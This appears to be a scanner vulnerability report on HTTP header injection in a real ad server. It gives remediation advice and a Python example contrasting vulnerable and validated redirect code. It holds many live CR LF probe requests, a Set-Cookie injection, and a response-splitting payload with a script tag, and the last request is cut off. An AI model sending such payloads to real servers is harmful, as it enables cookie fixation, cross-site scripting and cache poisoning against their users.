HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject carriage-return and line-feed characters (CR LF, sent URL-encoded as %0d%0a in the requests below) into the header, they can terminate that header and append new HTTP headers of their choosing, and, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response (response splitting).
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, the data should be strictly validated to prevent header injection attacks. In most situations it is appropriate to allow only short alphanumeric strings to be copied into headers and to reject any other input. At a minimum, input containing any character with an ASCII code below 0x20 (which includes CR and LF) or equal to 0x7F should be rejected. The check must be applied to the value after URL decoding: the %0d%0a in the requests below is decoded by the server before it reaches the Location header, so validating the still-encoded path would let it through.
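The pattern every instance below exhibits, as an added example written for this page (not the ad server's code and not the scanner's): a redirect builder that concatenates the decoded first path segment into Location, beside the allow-list check the remediation above asks for, plus two helpers that show what a client parsing the resulting bytes sees. The base URL and 36-byte body are taken from the responses shown below; the function names, the attacker inputs and the `rest` value are constructed for the example.

```python
import re

# Added example, not the ad server's code. STATIC_BASE and the 36-byte body are
# taken from the 302 responses on this page; everything else is constructed.
STATIC_BASE = "http://static.2mdn.net/"
BODY = b"<h1>Error 302 Moved Temporarily</h1>"


def build_redirect_vulnerable(segment: str, rest: str) -> bytes:
    """Vulnerable pattern: the decoded first path segment is concatenated
    straight into Location, so a CR LF inside it ends the header line and
    whatever follows is parsed as further headers (or, after a blank line, as body)."""
    head = (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        "Content-Type: text/html\r\n"
        f"Content-Length: {len(BODY)}\r\n"
        f"Location: {STATIC_BASE}{segment}/{rest}\r\n"
        "\r\n"
    )
    return head.encode("latin-1") + BODY


# Allow-list from the remediation text: short alphanumeric strings only.
SAFE_SEGMENT = re.compile(r"[A-Za-z0-9]{1,32}")


def validate_segment(segment: str) -> str:
    """Reject anything outside the allow-list. Applied to the decoded value, so
    %0d%0a that the server has already turned into CR LF is caught; the
    allow-list also excludes every control character below 0x20 and DEL."""
    if SAFE_SEGMENT.fullmatch(segment) is None:
        raise ValueError(f"unsafe value for Location header: {segment!r}")
    return segment


def build_redirect_safe(segment: str, rest: str) -> bytes:
    """Hardened builder: same output, but only for validated input."""
    return build_redirect_vulnerable(validate_segment(segment), rest)


def header_names(raw: bytes) -> list:
    """Header names a client parses from the response head (everything before
    the first blank line, minus the status line)."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    return [line.split(b":", 1)[0] for line in head.split(b"\r\n")[1:]]


def message_count(raw: bytes) -> int:
    """Number of status lines at line starts: how many responses a proxy
    reading this byte stream would see."""
    return sum(1 for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1.1 "))


if __name__ == "__main__":
    rest = "home.nasdaq.com/home6;tile=1;sz=728x90"   # constructed stand-in for the rest of the path
    # 1. Appending a header: the injected Set-Cookie is parsed like any other header.
    raw = build_redirect_vulnerable("7051b\r\nSet-Cookie: id=attacker", rest)
    print(header_names(raw))
    # 2. Splitting the response: an injected blank line ends the headers and a
    #    second, attacker-written response follows in the same stream.
    split = ("7051b\r\nContent-Length: 0\r\n\r\n"
             "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 25\r\n\r\n"
             "<script>alert(1)</script>")
    print(message_count(build_redirect_vulnerable(split, rest)))
    # 3. The hardened builder refuses the same input before it reaches the header.
    try:
        build_redirect_safe("7051b\r\nSet-Cookie: id=attacker", rest)
    except ValueError as exc:
        print("rejected:", exc)
```

In case 2 the first message ends up carrying two Content-Length values (the server's 36 and the injected 0); proxies and browsers differ on which one they honour, and that parsing ambiguity is exactly what cache-poisoning variants of this attack rely on. It is also why the remediation rejects control characters outright rather than trying to repair the value. Many current web frameworks refuse CR LF in header values on their own, but the allow-list is still the right application-level check, since it does not depend on the framework below it.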
The value of REST URL parameter 1 is copied into the Location response header. The payload 1a606%0d%0a253b87d272 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1a606%0d%0a253b87d272/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=;ord=1049337642? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 9d44e%0d%0a869be57a127 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9d44e%0d%0a869be57a127/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BrcJrbvtXTf6TNIT2lQfNubWcC42HpOsBhaKK8hLjqLazM-CE7gEQARgBIL7O5Q04AFDEwrTWBmDJhqOH1KOAEKABo67u9gOyARBjZG4uY2xvdWRzY2FuLnVzugEJNzI4eDkwX2FzyAEJ2gFeaHR0cDovL2Nkbi5jbG91ZHNjYW4udXMvZXhhbXBsZXMvaHRtbC91c2VyLWFnZW50LWh0dHAtaGVhZGVyLXhzcy1leGFtcGxlLXBvYy13d3dhbWF6b25jb20uaHRtbLgCGMACBcgC5e_FGKgDAdEDgo3m5suica71AwAAAMQ&num=1&sig=AGiWqtznA6d-3GhQY0LBGCyoAOJXFnbytA&client=ca-pub-4063878933780912&adurl=;ord=771430114? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297633216&flash=10.2.154&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611638827&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611638849&frm=0&adk=1607234649&ga_vid=1005309629.1297611639&ga_sid=1297611639&ga_hid=1032767937&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=64&xpc=5uyat7KDmc&p=http%3A//cdn.cloudscan.us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 25b51%0d%0aff0eb37d473 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /25b51%0d%0aff0eb37d473/N5214.3541.OVERSTOCK.COM/B2885999.13;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BK95zEwpYTdCGEt_ulQe2qMWaC93uresBjZXWqBy1x-_rWQAQARgBIL7O5Q04AFDnr7C1BGDJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBWGZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2V4cGxvaXRzL3VyaS1jbGljay10by1leGVjdXRlLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy5odG1sLmh0bWyYArYCuAIYwAIFyALlwo0VqAMB0QOCjebmy6JxrugDugLoA-IF9QMAAADE&num=1&sig=AGiWqty2NvaoNMLveUXjvsdkZWujyawEuQ&client=ca-pub-4063878933780912&adurl=;ord=1948801322? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636995&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615395709&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615395737&frm=0&adk=1607234649&ga_vid=1506605237.1297615396&ga_sid=1297615396&ga_hid=1161322831&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143102&fu=0&ifi=1&dtd=79&xpc=jj0vJF01eu&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 177bd%0d%0ac3a4c9955b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /177bd%0d%0ac3a4c9955b/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=;ord=1312776792? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 94e78%0d%0a645d5eb81b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /94e78%0d%0a645d5eb81b4/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=;ord=405226418? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 4c782%0d%0ab14eff0665b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4c782%0d%0ab14eff0665b/N4319.AOLMEN/B3889342.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000790494/mnum=0000972261/cstr=1367174=_4d572fb6,7110056810,790494%5E972261%5E65%5E0,1_/xsxdata=$xsxdata/bnum=1367174/optn=64?trg=;ord=7110056810? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 7705d%0d%0ab0ea55ca902 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7705d%0d%0ab0ea55ca902/footer.nasdaq.com/fidelity;tile=11;;abr=!webtv;key=value;sz=120x60;ord=%7B793802500935271400%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/aspx/market-headlines.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7705d
b0ea55ca902/footer.nasdaq.com/fidelity;tile=11;;abr=!webtv;key=value;sz=120x60;ord={793802500935271400}:
Date: Sun, 13 Feb 2011 01:44:28 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 62c40%0d%0a0652e203bb0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62c40%0d%0a0652e203bb0/home.nasdaq.com/;tile=6;;abr=!webtv;key=value;sz=120x60;ord=%7B563948719995096300%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nasdaq.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62c40
0652e203bb0/home.nasdaq.com/;tile=6;;abr=!webtv;key=value;sz=120x60;ord={563948719995096300}:
Date: Sun, 13 Feb 2011 01:54:58 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2a5df%0d%0afc3eb0af9a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2a5df%0d%0afc3eb0af9a7/home.nasdaq.com/ROSToolbar;tile=2;;abr=!webtv;key=value;sz=185x35;ord=%7B121342767495661970%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/aspx/market-headlines.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2a5df
fc3eb0af9a7/home.nasdaq.com/ROSToolbar;tile=2;;abr=!webtv;key=value;sz=185x35;ord={121342767495661970}:
Date: Sun, 13 Feb 2011 01:44:23 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 81e4c%0d%0a1ffd78c1dc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /81e4c%0d%0a1ffd78c1dc/home.nasdaq.com/home;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B559788043843582300%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/81e4c
1ffd78c1dc/home.nasdaq.com/home;tile=1;;abr=!webtv;key=value;sz=728x90;ord={559788043843582300}:
Date: Sun, 13 Feb 2011 02:13:12 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 69278%0d%0a74b1f29c7f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /69278%0d%0a74b1f29c7f9/home.nasdaq.com/home3;tile=6;;abr=!webtv;key=value;sz=120x60;ord=%7B353306817589327700%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nasdaq.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/69278
74b1f29c7f9/home.nasdaq.com/home3;tile=6;;abr=!webtv;key=value;sz=120x60;ord={353306817589327700}:
Date: Sun, 13 Feb 2011 01:58:47 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 7051b%0d%0ab920e046081 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7051b%0d%0ab920e046081/home.nasdaq.com/home6;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B788932431722059900%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nasdaq.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7051b
b920e046081/home.nasdaq.com/home6;tile=1;;abr=!webtv;key=value;sz=728x90;ord={788932431722059900}:
Date: Sun, 13 Feb 2011 01:55:11 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 75f27%0d%0a6c3c570ede2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /75f27%0d%0a6c3c570ede2/invprod.nasdaq.com/etfs;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B994284154148772400%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/investing/etfs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/75f27
6c3c570ede2/invprod.nasdaq.com/etfs;tile=1;;abr=!webtv;key=value;sz=728x90;ord={994284154148772400}:
Date: Sun, 13 Feb 2011 01:45:05 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 9caf3%0d%0a9b5f4bccf9b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9caf3%0d%0a9b5f4bccf9b/invprod.nasdaq.com/heatmap;tile=4;;abr=!webtv;key=value;sz=120x60;ord=%7B785258022835478100%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://quotes.nasdaq.com/screening/heatmaps.stm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9caf3
9b5f4bccf9b/invprod.nasdaq.com/heatmap;tile=4;;abr=!webtv;key=value;sz=120x60;ord={785258022835478100}:
Date: Sun, 13 Feb 2011 02:13:30 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 67566%0d%0a9102e73c4e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /67566%0d%0a9102e73c4e/invprod.nasdaq.com/heatmap_n100;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B53870897507295016%7D? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://quotes.nasdaq.com/screening/heatmaps.stm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
